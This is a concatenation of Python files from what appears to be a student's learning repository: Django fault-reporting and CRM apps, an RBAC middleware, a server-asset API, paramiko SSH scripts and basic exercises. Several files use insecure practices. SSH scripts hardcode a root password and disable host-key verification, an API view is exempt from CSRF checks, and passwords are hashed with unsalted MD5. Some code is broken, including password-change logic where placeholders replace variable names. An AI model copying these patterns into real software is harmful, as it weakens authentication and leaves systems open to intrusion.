stu_obj.class_obj=cls_obj self.student_pickle.dump(stu_obj) def show_student(self): for num, student_obj in enumerate(self.student_pickle.load(), 1): print('\033[1;32m查看信息为:%s,%s\033[0m' % (num, student_obj)) <file_sep>/day15/python连接mysql/获取自增id.py import pymysql conn=pymysql.connect(host='localhost',user='root',password='123',database='user') cursor=conn.cursor() sql="insert into t1(name,pwd) values('aaa','123')" 
rows=cursor.execute(sql) print(cursor.lastrowid) #在插入语句后查看 conn.commit() cursor.close() conn.close()<file_sep>/deploy/script/压缩j解压缩.py import shutil # 压缩文件 # shutil.make_archive(base_name=r'C:\Users\Administrator\Desktop\deploy\script',format='zip',root_dir=r'C:\Users\Administrator\Desktop\deploy\script') # base_name 要压缩成那个文件 # root_dir 要压缩那个目录里面的文件 # 解压文件 # shutil.unpack_archive(r'C:\Users\Administrator\Desktop\deploy\script.zip', # extract_dir=r'C:\Users\Administrator\Desktop\deploy\uuu') # extract_dir 解压的文件放到那个目录,如果目录不存在就创建,如果不能解压报错,就是因为压缩文件已经损坏 <file_sep>/day21/CMS/fault_reporting/models.py from django.db import models from django.contrib.auth.models import AbstractUser # Create your models here. class UserInfo(AbstractUser): phone=models.CharField(max_length=11) avatar=models.FileField(upload_to="avatars/",default="avatars/default.png") class LOB(models.Model): """ 业务线 """ title = models.CharField(max_length=32, unique=True, verbose_name="业务线名称") def __str__(self): return self.title class Meta: verbose_name = "业务线" verbose_name_plural = verbose_name class Tag(models.Model): """ 故障标签 """ title = models.CharField(max_length=32, verbose_name="标签名称", unique=True) def __str__(self): return self.title class Meta: verbose_name = "标签" verbose_name_plural = verbose_name class UpDown(models.Model): """django_admin_log 支持或反对 同一个用户只能对一篇故障总结点支持或反对 支持或反对只能二选一:点了支持就不能点反对,反之亦然 """ user = models.ForeignKey(to="UserInfo", verbose_name="用户") fault_report = models.ForeignKey(to="FaultReport", verbose_name="故障总结") is_up = models.BooleanField(default=True, verbose_name="支持/反对") def __str__(self): return "{}-{}-{}".format(self.user.username, self.fault_report, "支持" if self.is_up else '反对') class Meta: # 联合唯一 # 限制一个用户只能给一篇故障总结点赞或反对一次 unique_together = (("fault_report", "user"),) verbose_name = "支持/反对" verbose_name_plural = verbose_name class Comment(models.Model): """ 评论 """ fault_report = models.ForeignKey(to="FaultReport", verbose_name="故障总结") user = 
models.ForeignKey(to="UserInfo") content = models.CharField(max_length=255) # 评论内容 create_time = models.DateTimeField(auto_now_add=True) # 自己关联自己的情况 parent_comment = models.ForeignKey(to="self", null=True, blank=True) def __str__(self): return self.content class Meta: verbose_name = "评论" verbose_name_plural = verbose_name class FaultReport(models.Model): """ 故障总结/故障报告 """ title = models.CharField(max_length=80, verbose_name="故障标题") desc = models.CharField(max_length=255, verbose_name="故障简介") create_time = models.DateTimeField(auto_now_add=True, verbose_name="发布时间") modify_time = models.DateTimeField(auto_now=True, verbose_name="最后修改时间") comment_count = models.IntegerField(default=0) up_count = models.IntegerField(default=0) down_count = models.IntegerField(default=0) lob = models.ForeignKey(to="LOB", null=True, verbose_name="所属业务线") user = models.ForeignKey(to="UserInfo", verbose_name="发布者") tags = models.ManyToManyField( to="Tag", through="Fault2Tag", # 指定第三张关系表 through_fields=("fault_report", "tag"), # 通过哪些字段建立多对多关系 ) def __str__(self): return self.title class Meta: verbose_name = "故障总结/故障报告" verbose_name_plural = verbose_name class Fault2Tag(models.Model): """ 故障报告和标签的多对多关系表 """ fault_report = models.ForeignKey(to="FaultReport", on_delete=models.CASCADE) tag = models.ForeignKey(to="Tag") def __str__(self): return "{}-{}".format(self.fault_report, self.tag) class Meta: unique_together = (("fault_report", "tag"),) verbose_name = "故障-标签" verbose_name_plural = verbose_name class FaultDetail(models.Model): """ 故障详情表 """ content = models.TextField() fault = models.OneToOneField(to="FaultReport") def __str__(self): return self.content[0:50] class Meta: verbose_name = "故障详情表" verbose_name_plural = verbose_name<file_sep>/day22/new/rbac/middleware/rbac.py ''' 自定义rbac中间件 ''' from django.utils.deprecation import MiddlewareMixin from django.shortcuts import redirect,HttpResponse,render import re from django.conf import settings class RBACMiddleware(MiddlewareMixin): def 
process_request(self,request): ''' 自定义权限校验的中间件 :param request: 请求对象 :return: ''' # 1 取到当前这次请求访问的url是什么 url=request.path_info # request.get_full_path() # 过滤白名单 for item in settings.PERMISSION_WHITE_URL: reg="^{}$".format(item) if re.match(reg,url): return None # 取到当前用户的权限列表 permission_list=request.session.get(settings.PERMISSION_SESSION_KEY,None) # 进行权限校验 if permission_list is None: # 用户没登录 return redirect("/login/") for i in permission_list: reg="^{}$".format(i['permissions__url']) if re.match(reg,url): break else: return HttpResponse("你没有此权限") <file_sep>/auto_server/api/views.py # Create your views here. from django.shortcuts import render, HttpResponse from django.views.decorators.csrf import csrf_exempt # 用djanjo自带的csrf import json from .plugins import PluginManger from datetime import date from repository import models from django.db.models import Q @csrf_exempt # 这个函数不走csrf_token def server(request): if request.method == "GET": current_date = date.today() # 获取今日未采集的主机列表 # 条件是更新时间为空,并且更新的时间小于现在的时间,还有主机的状态是在线状态才会拿到未采集的列表 ,双下划线date就是只取年月日 host_list = models.Server.objects.filter( Q(Q(latest_date=None) | Q(latest_date__date__lt=current_date)) & Q(server_status_id=2) ).values('hostname') host_list = list(host_list) print(host_list) return HttpResponse(json.dumps(host_list)) elif request.method == "POST": # 客户端提交的最新数据 server_dict = json.loads(request.body.decode('utf-8')) # 把二进制转换成utf-8, print(server_dict) # 检查server表中是否有当前资产信息(根据主机名去判断) if not server_dict['basic']['status']: # 如果状态码有误 return HttpResponse('获取不到信息') manager = PluginManger() response = manager.exec(server_dict) return HttpResponse(json.dumps(response)) # hostname = server_dict['basic']['data']['hostname'] # server_obj = models.Server.objects.filter(hostname=hostname).first() # if not server_obj: # # 创建服务器,创建硬盘内存网卡 # tmp = {} # tmp.update(server_dict['basic']['data']) # tmp.update(server_dict['board']['data']) # server_obj = models.Server.objects.create(**tmp) # # 网卡,内存,硬盘 # # # 硬盘 # disk_info_dict = 
server_dict['disk']['data'] # for item in disk_info_dict.values(): # item['server_obj'] = server_obj # models.Disk.objects.create(**item) # # 内存 # mem_info_dict = server_dict['memory']['data'] # for item in mem_info_dict.values(): # item['server_obj'] = server_obj # models.Memory.objects.create(**item) # # 网卡 # nic_info_dict = server_dict['nic']['data'] # for k, v in nic_info_dict.items(): # v['server_obj'] = server_obj # v['name'] = k # models.NIC.objects.create(**v) # # else: # 更新 # # 更新server表 # tmp = {} # tmp.update(server_dict['basic']['data']) # tmp.update(server_dict['board']['data']) # tmp.pop('hostname') # record_list = [] # for k, new_val in tmp.items(): # old_val = getattr(server_obj, k) # if old_val != new_val: # record = "[%s]的[%s]由[%s]变更为[%s]" % (server_obj.hostname, k, old_val, new_val) # record_list.append(record) # setattr(server_obj, k, new_val) # server_obj.save() # if record_list: # models.ServerRecord.objects.create(server_obj=server_obj, content=';'.join(record_list)) # # # 硬盘 # new_disk_info_dict = server_dict['disk']['data'] # 客户端发送过来新的数据 # # # """ # 新的数据格式是字典 # { # '0': {'slot': '0', 'pd_type': 'SAS', 'capacity': '279.396', 'model': 'SEAGATE ST300MM0006 LS08S0K2B5NV'}, # '1': {'slot': '1', 'pd_type': 'SAS', 'capacity': '279.396', 'model': 'SEAGATE ST300MM0006 LS08S0K2B5AH'}, # '2': {'slot': '2', 'pd_type': 'SATA', 'capacity': '476.939', 'model': 'S1SZNSAFA01085L # # } # """ # new_disk_info_list = server_obj.disk.all() # """ # 数据格式是这样的一个个对象 # [ # obj, # obj, # ] # """ # new_disk_slot_set = set(new_disk_info_dict.keys()) # 拿到前面的序号 {'3', '4', '5', '11', '9', '1', '2'} # old_disk_slot_set = {obj.slot for obj in new_disk_info_list} # 拿到前面的序号 # # add_slot_list = new_disk_slot_set.difference(old_disk_slot_set) # 取差集 # del_slot_list = old_disk_slot_set.difference(new_disk_slot_set) # update_slot_list = old_disk_slot_set.intersection(new_disk_slot_set) # # # 增加 # add_record_list = [] # for slot in add_slot_list: # slot是key # value = 
new_disk_info_dict[slot] # 根据key获得value # tmp = "添加硬盘" # add_record_list.append(tmp) # value['server_obj'] = server_obj # models.Disk.objects.create(**value) # # 删除 包含在del_slot_list里面的全部删除掉 # models.Disk.objects.filter(server_obj=server_obj, slot__in=del_slot_list).delete() # # # 更新 # # record_list = [] # 定义一个更改列表 # for slot in update_slot_list: # # print(slot) # slot是序号,0,2,3 # value = new_disk_info_dict[slot] # slot': '0', 'pd_type': 'SAS', 'capacity': '279.396', 'model': 'SEAGATE ST300MM0006 LS08S0K2B5NV' # obj = models.Disk.objects.filter(server_obj=server_obj, slot=slot).first() # # print('我是更新里面的obj',obj) # for k, new_val in value.items(): # old_val = getattr(obj, k) # # print(old_val) # # if old_val != new_val: # # record = "[%s]的[%s]里面的[%s]由[%s]变更为[%s]" % (self.server_obj.hostname, slot, k, old_val, new_val) # # print(record) # # record_list.append(record) # # print(record_list) # setattr(obj, k, new_val) # obj.save() # return HttpResponse('OK') <file_sep>/deploy/script/用户名密码.py import paramiko # 创建SSH对象 ssh = paramiko.SSHClient() # 允许连接不在know_hosts文件中的主机 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 连接服务器 ssh.connect(hostname='192.168.7.32', port=22, username='root', password='123') # 执行命令 stdin, stdout, stderr = ssh.exec_command('ifconfig') # 获取命令结果 result = stdout.read() # 关闭连接 ssh.close() print(result) <file_sep>/day27/s21crm/crm/forms/depart.py from django import forms from crm import models class DepartModelForm(forms.ModelForm): class Meta: model = models.Department # 这里前面的model一定不要写models fields = '__all__' error_messages = { 'title': {'required': '部门不能为空'} } widgets = { 'title': forms.TextInput(attrs={'class': 'form-control'}) } <file_sep>/day24/auto - 12 - 权限粒度控制到按钮/app01/urls.py from django.conf.urls import url,include from django.contrib import admin from app01 import views urlpatterns = [ url(r'^login/$', views.login), url(r'^user/$', views.user_list), url(r'^user/add/$', views.user_add), url(r'^user/edit/(\d+)/$', 
#!/usr/bin/python
# -*- coding:utf-8 -*-
from config import settings
from .base import SaltAndSSHHandler


class SSHHandler(SaltAndSSHHandler):
    def cmd(self, command, hostname=None):
        """
        Run a command on a remote host via paramiko using RSA-key auth.

        :param command: shell command to execute remotely
        :param hostname: target host name/IP (caller must supply one)
        :return: raw bytes read from the remote command's stdout
        """
        import paramiko
        private_key = paramiko.RSAKey.from_private_key_file(settings.SSH_PRIVATE_KEY)
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(hostname=hostname, port=settings.SSH_PORT,
                    username=settings.SSH_USER, pkey=private_key)
        try:
            stdin, stdout, stderr = ssh.exec_command(command)
            result = stdout.read()
        finally:
            # Close even when exec_command()/read() raises — the original
            # leaked the connection on any failure after connect().
            ssh.close()
        return result
def hamd5(self): name = input('<<<:') pwd = input('<<<:') md5obj = hashlib.md5(self.name.encode('utf-8')) md5obj.update('self.passwd'.encode('utf-8')) ret=md5obj.hexdigest() print(ret) # @staticmethod # def login(): alex=Longin('alex','alex3714') alex.hamd5() <file_sep>/day26/谷歌无头浏览器.py from selenium import webdriver from selenium.webdriver.chrome.options import Options import time # 创建一个参数对象,用来控制谷歌浏览器无界面打开 chrome_options = Options() chrome_options.add_argument('--headless') chrome_options.add_argument('--disable-gpu') # 驱动路径 path=r'D:\python21\python\day26\selenium自动化操作\chromedriver_win32\chromedriver.exe' #创建浏览器对象 browser=webdriver.Chrome(executable_path=path,chrome_options=chrome_options) # 上网 url='http://www.baidu.com/' browser.get(url=url) time.sleep(2) browser.save_screenshot('baidu.png') #后缀推荐用png,jpg会提示信息 browser.quit() <file_sep>/day17/lianxi/orm查询数据.py import os if __name__ == '__main__': os.environ.setdefault("DJANGO_SETTINGS_MODULE", "lianxi.settings") import django django.setup() from app01 import models # 查询一个 # ret = models.Person.objects.get(age=18) # print(ret) # 查询所有 # ret1 = models.Person.objects.filter(age=18) # print(ret1) # # ret2 = models.Person.objects.filter(age=18).values("age", "phone","name") # print(ret2) # # ret3 = models.Person.objects.filter(age=18).values_list("age", "phone",'name') # print(ret3) # 排序 # ret = models.Person.objects.all().order_by("age") # print(ret) # 查询大于18的 # ret1 = models.Person.objects.filter(age__gt=18) # print(ret1) # 查询id在【1,2】的人 # ret = models.Person.objects.filter(id__in=[1,2]) # print(ret) # 查询id不在【1,2】 # ret = models.Person.objects.exclude(id__in=[1,2]) # print(ret) # 查询名字中包含jj的那个人(不区分大小写) # ret = models.Person.objects.filter(name__contains="JJ") # print(ret) # 查询id在1-3区间内的数据 # ret = models.Person.objects.filter(id__range=[1, 3]) # print(ret) # 查询以JJ结尾的人 # ret = models.Person.objects.filter(name__endswith='JJ') # print(ret) # 查询生日在2018年的,(sqlit查不到) # ret = models.Person.objects.filter(birthday__year=2018) 
# print(ret) # 查询第一本书关联的出版社名字 #基于对象的查询 # book_obj=models.Book.objects.first() # ret=book_obj.publisher.name # book_name=book_obj.title # print(book_name,ret) # 基于querset 的双下划线查询,双下划线表示跨表,查询出版社名字,并去重 # ret = models.Book.objects.all().values_list("publisher__name").distinct() # print(ret) # 反向查询 # 由出版社反向查找书籍 publisher_obj=models.Publisher.objects.get(id=2) books=publisher_obj.book_set.all() title=books.values_list("title","id") print(title) # 2. 基于queryset的双下划线 # 江出版社出版的所有书籍的书名 ret = models.Publisher.objects.filter(id=2).values_list("book__title","book__id") print(ret)<file_sep>/day24/auto - 12 - 权限粒度控制到按钮/相关脚本/3.构建菜单结构.py permission_list = [ { 'permissions__title': '用户列表', 'permissions__url': '/app01/user/', 'permissions__name': 'user_list', 'permissions__menu_id': 1, 'permissions__menu__title': '用户管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None }, { 'permissions__title': '订单列表', 'permissions__url': '/app01/order/', 'permissions__name': 'order', 'permissions__menu_id': 2, 'permissions__menu__title': '商品管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None }, ] """ menu_dict = { 1:{ 'title':'用户管理', 'icon':'fa-clipboard', 'children':[ {'title':'用户列表','url':'/app01/user/'}, ] }, 2:{ 'title':'商品管理', 'icon':'fa-clipboard', 'children':[ {'title':'订单列表','url':'/app01/order/'}, ] } } """ menu_dict = {} for item in permission_list: menu_id = item['permissions__menu_id'] if menu_id in menu_dict: menu_dict[menu_id]['children'].append({'title':item['permissions__title'],'url':item['permissions__url'],'name':item['permissions__name'] }) else: menu_dict[menu_id] = { 'title': item['permissions__menu__title'], 'icon': item['permissions__menu__icon'], 'children':[ {'title':item['permissions__title'],'url':item['permissions__url'],'name':item['permissions__name'] } ] } print(menu_dict) <file_sep>/day27/s21crm/crm/views/login.py from django.shortcuts import 
render, redirect from django.urls import reverse from crm import models from crm.pwd.md5 import md5 from rbac.service.permission import init_permission from functools import wraps # session 登录装饰器 def login_check(func): @wraps(func) def inner(request, *args, **kwargs): next_url = request.path_info if request.session.get('user'): return func(request, *args, **kwargs) else: return redirect("/login/?next_url={}".format(next_url)) return inner # 注销页面 @login_check def logout(request): # 删除所有当前请求相关的session request.session.delete() return redirect("/login/") def login(request): """ 用户登录 :param request: :return: """ if request.method == 'GET': return render(request, 'login.html') user = request.POST.get('username') pwd = md5(request.POST.get('password')) user_object = models.UserInfo.objects.filter(username=user, password=pwd).first() if not user_object: return render(request, 'login.html', {'error': '用户名或密码错误'}) # 用户登录的信息存储到session里面 request.session['user_info'] = {'id': user_object.id, 'name': user_object.username} init_permission(user_object, request) return redirect(reverse('index')) def index(request): return render(request, 'index.html') <file_sep>/day9/线程/锁.py from threading import Thread,Lock import time def work(): global n lock.acquire() temp=n time.sleep(0.1) n=temp-1 lock.release() if __name__ == '__main__': lock = Lock() n=100 l=[] for i in range(10): p=Thread(target=work) l.append(p) p.start() for i in l: i.join() print(n) # 当你的程序中出现了取值计算再赋值的操作 数据不安全 —— 加锁 <file_sep>/auto_server/api/plugins/disk.py from repository import models class Disk(object): def __init__(self, server_obj, info): ''' :param server_obj: 主机名 :param info: 硬盘信息 ''' self.server_obj = server_obj self.disk_dict = info def process(self): new_disk_info_dict = self.disk_dict['data'] # 客户端发送过来新的数据 """ 新的数据格式是字典 { '0': {'slot': '0', 'pd_type': 'SAS', 'capacity': '279.396', 'model': 'SEAGATE ST300MM0006 LS08S0K2B5NV'}, '1': {'slot': '1', 'pd_type': 'SAS', 'capacity': '279.396', 'model': 'SEAGATE 
ST300MM0006 LS08S0K2B5AH'}, '2': {'slot': '2', 'pd_type': 'SATA', 'capacity': '476.939', 'model': 'S1SZNSAFA01085L } """ new_disk_info_list = self.server_obj.disk.all() """ 数据格式是这样的一个个对象 [ obj, obj, ] """ new_disk_slot_set = set(new_disk_info_dict.keys()) # 拿到前面的序号 old_disk_slot_set = {obj.slot for obj in new_disk_info_list} # 拿到前面的序号 add_slot_list = new_disk_slot_set.difference(old_disk_slot_set) # 取差集 del_slot_list = old_disk_slot_set.difference(new_disk_slot_set) update_slot_list = old_disk_slot_set.intersection(new_disk_slot_set) print(update_slot_list) # 增加 add_record_list = [] for slot in add_slot_list: # slot是key value = new_disk_info_dict[slot] # 根据key获得value tmp = "添加硬盘" add_record_list.append(tmp) value['server_obj'] = self.server_obj models.Disk.objects.create(**value) # 删除 包含在del_slot_list里面的全部删除掉 models.Disk.objects.filter(server_obj=self.server_obj, slot__in=del_slot_list).delete() # 更新 # record_list = [] # 定义一个更改列表 for slot in update_slot_list: # print(slot) value = new_disk_info_dict[slot] # slot': '0', 'pd_type': 'SAS', 'capacity': '279.396', 'model': 'SEAGATE ST300MM0006 LS08S0K2B5NV' obj = models.Disk.objects.filter(server_obj=self.server_obj, slot=slot).first() # print('我是更新里面的obj',obj) for k, new_val in value.items(): old_val = getattr(obj, k) # print(old_val) if old_val != new_val: # record = "[%s]的[%s]里面的[%s]由[%s]变更为[%s]" % (self.server_obj.hostname, slot, k, old_val, new_val) # print(record) # record_list.append(record) # print(record_list) setattr(obj, k, new_val) obj.save() # if record_list: # models.ServerRecord.objects.create(server_obj=self.server_obj, content=';'.join(record_list)) <file_sep>/day20/CMS/fault_reporting/views.py from django.shortcuts import render, redirect, HttpResponse from django import views from django.contrib import auth import random from fault_reporting import forms from fault_reporting import models from django.http import JsonResponse # Create your views here. 
class LoginView(views.View): ''' 如果用户发送的是get就返回登录页面 如果是post请求,先获取用户想访问那个页面用next,然后让他输入用户名密码还有验证码,先验证 用户名和密码,然后再判断验证码是否正确,如果都是正确的,就跳转到用户访问的那个页面 ''' def get(self, request): return render(request, "login.html") def post(self, request): next_url = request.GET.get("next", "/index/") username = request.POST.get("username") pwd = request.POST.get("password") v_code = request.POST.get("vcode", "").upper() # 如果用户不写验证码就是空 if v_code == request.session.get("v_code"): user_obj = auth.authenticate(username=username, password=pwd) if user_obj: auth.login(request, user_obj) # auth认证登录 return redirect(next_url) else: return render(request, "login.html", {"error_msg": "用户名或密码错误"}) else: return render(request, "login.html", {"error_msg": "验证码错误"}) def logout(request): ''' 注销用auth模块,然后跳转到登录页面 :param request: :return: ''' auth.logout(request) return redirect("/login/") # 首页 def index(request, *args): ''' index可以传参数类似 --/lob/视频/--格式的参数 args[1]代表第二个参数,0代表第一个 首先分别取到业务,标签,时间的个数,然后点击不同的业务,标签,或时间跳转属于自己的内容界面 时间这里加上了try except捕获异常,因为怕用户输入的时间日期,不符合格式,如果没有这个日期则返回空 统计数量用的是orm的聚合查询需要先导入count :param request: :param args: :return: ''' # 取到所有的故障总结 report_list = models.FaultReport.objects.all() # 如果有参数,并且参数长度是2 if args and len(args) == 2: # 进入细分查询 if args[0] == "lob": # 按业务线查询, report_list = report_list.filter(lob__title=args[1]) #args[1]指的是视频等业务 elif args[0] == "tag": # 是按照标签查询 report_list = report_list.filter(tags__title=args[1]) else: # 按照日期(年月)来查询 try: year, month = args[1].split("-") #以-切割,取出年和月 print(year) report_list = report_list.filter(create_time__year=year, create_time__month=month) except Exception: report_list = [] # 导入 from django.db.models import Count # 聚合查询业务线 ,title是LOB表里的title lob_list = models.LOB.objects.all().annotate(num=Count("faultreport")).values("title", "num") # 正常查询 # lob_list = models.LOB.objects.all() # 取到所有标签 # tag_list=models.Tag.objects.all() # 分组获取标签 tag_list = models.Tag.objects.all().annotate(num=Count("faultreport")).values("title", "num") # 拿到一个日期归档数据 
archive_list = models.FaultReport.objects.all().extra( select={"ym": "strftime('%%Y-%%m', create_time)"} ).values("ym").annotate(num=Count("id")).values("ym", "num") return render(request, "index.html", locals()) # 验证码路径 def vcode(request): from PIL import Image, ImageDraw, ImageFont # 导入绘图模块 # 定义一个生成随机颜色代码的函数 def random_color(): return random.randint(0, 255), random.randint(0, 255), random.randint(0, 255) # 创建一个随机背景颜色的图片对象 image_obj = Image.new( "RGB", (250, 35), # 背景图片的长和宽 (255, 255, 140) ) # 在该图片对象上生成一个画笔对象 draw_obj = ImageDraw.Draw(image_obj) # 加载一个字体对象 font_obj = ImageFont.truetype('static/font/kumo.ttf', 28) # 字体大小 tmp = [] for i in range(5): l = chr(random.randint(97, 122)) # 生成随机的小写字母 u = chr(random.randint(65, 90)) # 生成随机的大写字母 n = str(random.randint(0, 9)) # 生成一个随机的数字 # 从上面三个随机选一个 r = random.choice([l, u, n]) # 将选中过的那个字符写到图片上 draw_obj.text((30 * i + 30, 0), r, fill=random_color(), font=font_obj) # text指定的是从那开始写位置,fill是字体颜色 tmp.append(r) v_code = "".join(tmp).upper() # 将生成的验证码保存 request.session["v_code"] = v_code # 直接在内存中保存图片替代io操作 from io import BytesIO f1 = BytesIO() image_obj.save(f1, format="PNG") # 将背景图片保存到f1里面 img_data = f1.getvalue() # 去f1取图片 return HttpResponse(img_data, content_type="image/png") # 注册 class RegisterView(views.View): ''' 如果是get请求,就返回注册页面,用的form写的注册页面,先导入刚才写的forms模块,然后调用RggisterForm 如果是post请求(就是提交请求),form_obj获取到用户填的所有内容,然后去校验数据格式是否正确,如果没问题,就去 数据库里面创建数据,创建之前,要先删除re_password这个字段,因为数据库里没有这个字段 然后接受头像文件,需要用request.FILES,去获取 最后去数据库保存,需要把你的普通数据和头像数据分开来存储。 注册成功之后,就跳转到登录界面,否则就报报错信息返回到页面上面 ''' def get(self, request): form_obj = forms.RegisterForm() return render(request, "register.html", locals()) def post(self, request): res = {"code": 0} form_obj = forms.RegisterForm(request.POST) if form_obj.is_valid(): # 数据没问题,去数据库创建记录 form_obj.cleaned_data.pop("re_password") # 头像数据,文件对象 avatar_obj = request.FILES.get("avatar") # 头像文件保存到数据库,如果你的models里面写的这个字段FileField,就会自动写在服务器上面 models.UserInfo.objects.create_user(**form_obj.cleaned_data, 
avatar=avatar_obj) res["url"] = "/login/" else: # 数据有问题 res["code"] = 1 res["error"] = form_obj.errors return JsonResponse(res) def change_password(request): ''' 更改密码 首先获取用户名,当用户要改密码的时候让他先输入旧密码,然后在输入两次新密码,当点击提交的时候,会先检查旧密码 是否正确,如果是正确的就检查两次输入的新密码是否正确,如果两次新密码输入正确就保存,然后跳转到登录界面。如果旧密码不正确, 就提示错误。,两次新密码不一致也提示错误 :param request: :return: ''' #获取用户名 user = auth.get_user(request) state = None if request.method == 'POST': old_password = request.POST.get('old_password', '') new_password = request.POST.get('new_password', '') repeat_password = request.POST.get('repeat_password', '') if user.check_password(old_password): if not new_password: state = 'empty' elif new_password != <PASSWORD>: state = '两次密码不一致' return render(request, "change_password.html", {"error_new": state, "v": user}) else: user.set_password(<PASSWORD>) user.save() return redirect("/login/") else: state = '原始密码不对' return render(request, "change_password.html", {"error_old": state, "v": user}) return render(request, 'change_password.html', {"v": user}) <file_sep>/day5/预习.py ##json模块 import json # #dumps 将字典转换成字符串 # dic ={'k1':'1','k2':'2'} # str=json.dumps(dic) # print(str) # # list_dic = [1,['a','b','c'],3,{'k1':'v1','k2':'v2'}] # print(json.dumps(list_dic)) # #loads 将字符串转换成字典 # dic1=json.loads(str) # print(type(dic1)) ##dump #dump方法接收一个文件句柄,直接将字典转换成json字符串写入文件 # f = open('json_file','w') # dic = {'k1':'v1','k2':'v2','k3':'v3'} # json.dump(dic,f) # f.close() #load#load方法接收一个文件句柄,直接将文件中的json字符串转换成数据结构返回 # f = open('json_file') # dic2 = json.load(f) # f.close() # print(type(dic2),dic2) ##pickle 用于python特有的类型 和 python的数据类型间进行转换 import pickle #dumps # dic = {'k1':'v1','k2':'v2','k3':'v3'} # str_dic = pickle.dumps(dic) # print(str_dic) ##返回二进制内容 # #loads # dic2 = pickle.loads(str_dic) # print(dic2) #返回字典 import time # struct_time=time.localtime(1000000000) # print(struct_time) # f = open('pickle_file','wb') # pickle.dump(struct_time,f) # f.close() f = open('pickle_file','rb') struct_time2 = pickle.load(f) 
print(struct_time2.tm_year)<file_sep>/day2/02 int.py v = 11 data = v.bit_length() print (data) ##这个长度就是代表十进制变成二进制之后的长度 ##bool # 真 1 True # 假 0 False <file_sep>/day8/udp_server.py import socket sk=socket.socket(type=socket.SOCK_DGRAM) sk.bind(('127.0.0.1',8899)) while True: msg,addr=sk.recvfrom(1024) print(msg.decode('utf-8'),addr) inp=input('>>>:') if inp=='q':break sk.sendto(inp.encode('utf-8'),addr) #print(msg) sk.close()<file_sep>/复习/函数.py #定义一个函数 def mylen(): s1='hello world' length=0 for i in s1: length=length+1 print(length) mylen() #函数的返回值 # def func1(): # print(11) # print(22) # return # print(333) # print(444) # func1() #没有返回值 # def mylen(): # """计算s1的长度""" # s1 = "hello world" # length = 0 # for i in s1: # length = length+1 # # print(length) # str_len=mylen() # print('str_len:%s'%str_len) #一个返回值 # def mylen(): # """计算s1的长度""" # s1 = "hello world" # length = 0 # for i in s1: # length = length+1 # return length # str_len=mylen() # print('str_len:%s'%str_len) #返回多个值 # s1=(1,2,3,3) # def my_len(): # count = 0 # for i in s1: # count += 1 # return 666,222,count,'老男孩' # print(my_len(),type(my_len())) #返回多个值,用多个变量来接受 # def my_len(): # count = 0 # for i in s1: # count += 1 # return 666,222,count # ret1,ret2,ret3 = my_len() # (666, 222, 19,) # print(ret1) # print(ret2) # print(ret3) #函数的传参 # li = [1, 2, 3, 43, 'fdsa', 'alex'] # s1 = 'fdsgdfkjlgdfgrewioj' # # def my_len(a): # 函数的定义()放的是形式参数,形参 # count = 0 # for i in a: # count += 1 # return count # ret = my_len(li) # 函数的执行() 实际参数,实参 # print(ret) # print(len(s1)) # 实参分为:, #位置参数必须一一对应,按顺序 ''' def func(x,y): print(x,y) func(2,3) ''' #关键字参数,必须一一对应,不分顺序 ''' def func(x,y,z): print(x,y,z) func(y=4,z=2,x=1) ''' #混合参数 ''' def func2(argv1,argv2,argv3): print(argv1,argv2,argv3) func2(2,3,argv3=9) ''' #形参分为: #位置参数,必须一一对应 # def func(y,x): # print(y,x) # func(1,2) #默认参数,必须在位置参数后面 # def register(name,sex='男'): # with open('log1',encoding='utf-8',mode='a') as f1: # f1.write("{} {}\n".format(name,sex)) # register('hu') #动态参数 
*args,**kwargs # kwargs接收的只是键值对的参数,并保存在字典中 #args接收除去键值对以外的所有参数,保存成元组形式 # def func2(*args,**kwargs): # print(args) ##打印成元组 # print(kwargs) ##打印成字典 # func2(1,2,2,3,4,5,'alex','老男孩',a='ww',b='qq') #三种参数的和混合使用 # def func3(a,b,*args,sex='男'): ##顺序是 位置参数(关键字),*args ,默认参数 # print(a) # print(b) # print(sex) # print(args) # func3(1,2,'老男孩','alex',sex='女') # def func4(a,b,*args,sex='男',**kwargs): ##位置参数,*args,默认参数,**kwargs # print(a) # print(b) # print(args) # print(sex) # print(kwargs)#= # func4(1,2,3,'alex','aa',sex='女',name='alex') #打散 # def func1(*args,**kwargs): # print(args) # # print(kwargs) # l1 = [1,2,3,4] # l11 = (1,2,3,5) # l2 = ['alex','wusir',4] # func1(*l1,*l2,*l11) ##这个是以元组出现的 # def func1(*args,**kwargs): # # print(args) # print(kwargs) # dic1 = {'name1':'alex'} # dic2 = {'name2':'wusir'} # func1(**dic1,**dic2) ##出来的结果是以字典形式存在的 #函数的命名空间 # name = 'wusir' ##全局命名空间 # age = 12 # def func1(): # name1 = 'bob' ##局部命名空间 # age1 = 34 # return name1 # print(func1()) # print(name) # name1 = 'wusir' # def func1(): # print(name1) # def func2(): # print('xxxxx',name1) # func2() # func1() #查看命名空间 # name1 = 'wusir' # def func1(): # name2 = 'laonanhai' # print(globals()) ##查看全局变量 # print(locals()) ##查看局部变量 # func1() #global声明一个全局变量 # name = 'wusir' # def func1(): # global name ##声明一个全局变量 # name = 'alex' # return # func1() # print(name) ##打印的结果是alex # 对可变数据类型(list,dict,set)可以直接引用不用通过global。 # li = [1,2,3] # dic = {'a':'b'} # # def change(): # li.append('a') # dic['q'] = 'g' # print(dic) # print(li) # change() #nolocal不能修改全局变量 # def func2(): # name1 = 'alex' # print('+',name1)#alex # def inner(): # nonlocal name1 # name1 = 'wusir' # print('*',name1)#wusir # def inner1(): # pass # inner() # print('%',name1)#wusir # func2() #函数名 # #1 可以互相赋值 # def func1(): # print(666) # f1 = func1 # f1() #2 函数名可以当成函数的参数 # def func1(): # print(777) # def func2(argv): # argv() # print(999) # func2(func1) # 打印结果是 777 999 #可以当成容器类数据类型的参数 # def func1(): # print(666) # def func2(): # print(777) # def 
